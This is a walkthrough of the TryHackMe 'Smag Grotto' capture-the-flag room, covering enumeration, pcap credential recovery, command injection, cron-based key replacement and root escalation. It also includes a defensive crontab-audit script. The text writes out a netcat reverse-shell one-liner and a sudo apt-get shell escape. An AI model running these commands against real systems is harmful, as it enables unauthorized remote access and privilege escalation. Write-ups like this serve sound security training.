Smag Grotto Room on TryHackMe: Complete Walkthrough and Guide

LINK - https://tryhackme.com/room/smaggrotto
RECON/SCANNING
So first we will run Nmap (or nmapAutomator) to scan the target for open ports.

As you can see, we got two open ports.
WEB ENUMERATION
Now let's check out port 80 first.

We got a web page, so I browsed it and did some searching but didn't find anything. Next I tried Gobuster to find hidden directories.

As a result we found a 301 redirect to the /mail directory, so let's check it out:

We found a .pcap file inside the /mail directory, and the web page asks us to download it with wget, so we will do that.

Now let's analyze the .pcap file in Wireshark.
PCAP FILE ANALYSIS
On filtering for HTTP traffic we can see two entries which could give us some information.

Following either of them with Follow HTTP Stream:

In there we saw some juicy information:

As you can see, we got the hostname with a subdomain, on which there is a login.php, and the credentials for it are handed to us as well (they were sent in cleartext over HTTP).
GETTING REVERSE SHELL
Now let's quickly add the host and subdomain to our /etc/hosts.

Now let's see what is on the subdomain that we got from the .pcap file.

Nice, there are admin.php and login.php, so let's log in using the credentials we got.

As you can see, we successfully got into admin.php.
Now it asks us to enter a command. On inspecting it, I saw that it is the type of page which executes the command but doesn't show the output, so we might get a reverse shell from here.
So let's set up a netcat listener first.

Now let's inject this reverse shell payload (replace "your-ip" with your attacking machine's IP):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc "your-ip" 4444 >/tmp/f
On executing this on the web page we can see we got a reverse shell on our listener:

Now first stabilize this shell using the link below:
SHELL STABILIZING
LOCAL ENUMERATION
After stabilizing the shell we can see that we can't access user.txt, as it belongs to the user jake and we don't have any permission on it.
So now let's check out other services to get access as the jake user.
You can run LinPEAS, but I just instinctively went to /etc/crontab.

We can see there is a file named jake_id_rsa.pub.backup whose contents are copied over /home/jake/.ssh/authorized_keys periodically by a root cron job.
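The root cause here is a root cron job that trusts a file other users can write to. As an added example that is not part of the original walkthrough, this Python script audits a crontab for that pattern: it pulls the absolute paths out of each job's command field and flags any that group or world can modify. The crontab text and the temporary jake_id_rsa.pub.backup file are constructed for the demo.

```python
import os
import re
import stat
import tempfile

# Constructed crontab modelled on the room's misconfiguration: a root job
# copies a backup public key into jake's authorized_keys every minute.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/cat {backup} > /home/jake/.ssh/authorized_keys
"""

# Absolute paths inside a command field (a bare "/" on its own is not one).
PATH_RE = re.compile(r"(?<![\w-])(/[\w./-]+)")

def referenced_paths(crontab_text):
    """Return every absolute path named in the command field of a system crontab."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # skip blanks, comments and VAR=value assignments
        fields = line.split(None, 6)  # minute hour dom month dow user command
        if len(fields) == 7:
            paths.extend(PATH_RE.findall(fields[6]))
    return paths

def writable_by_others(path):
    """True if the file exists and its group or the world may write to it."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(crontab_text):
    """Paths a cron job reads or runs that a non-owner could tamper with."""
    return sorted({p for p in referenced_paths(crontab_text) if writable_by_others(p)})

def demo():
    """Create a world-writable backup key file in a temp dir and audit the sample."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = os.path.join(tmp, "jake_id_rsa.pub.backup")
        with open(backup, "w") as f:
            f.write("ssh-rsa AAAA-constructed-placeholder-key\n")
        os.chmod(backup, 0o666)  # the weak permission that lets any user replace the key
        return audit_crontab(SAMPLE_CRONTAB.format(backup=backup)), backup
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d; any path it reports is one a root job would happily consume after a low-privileged user has replaced it.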
USER FLAG
Since we have write permission on that file, we can edit its content and replace it with our own public key, so let's generate a key for this on our host machine using the command below.
ssh-keygen -t rsa -P '' -f jakekey

Now let's add the contents of jakekey.pub to the jake_id_rsa.pub.backup file.
You can do this either with nano or with echo.

Now, after giving the private key appropriate permissions, let's SSH in as jake.

There we go!!!
We successfully logged in as jake. Now let's get user.txt from /home/jake/user.txt.

ROOT FLAG
Now let's run sudo -l to see whether we have sudo permission on any file or service.

We can see there is a binary named apt-get that we can run with sudo.
Let's search for it on GTFOBins; maybe we can find a way to escalate to the root user.

There we go, we got a way to escalate from jake to root by executing the command below:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
VOILA!!!!
We got the root user. Now let's grab the root.txt flag.

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For any query or problem, either leave a comment or contact me at reapsec.com.
THANK YOU FOR READING!!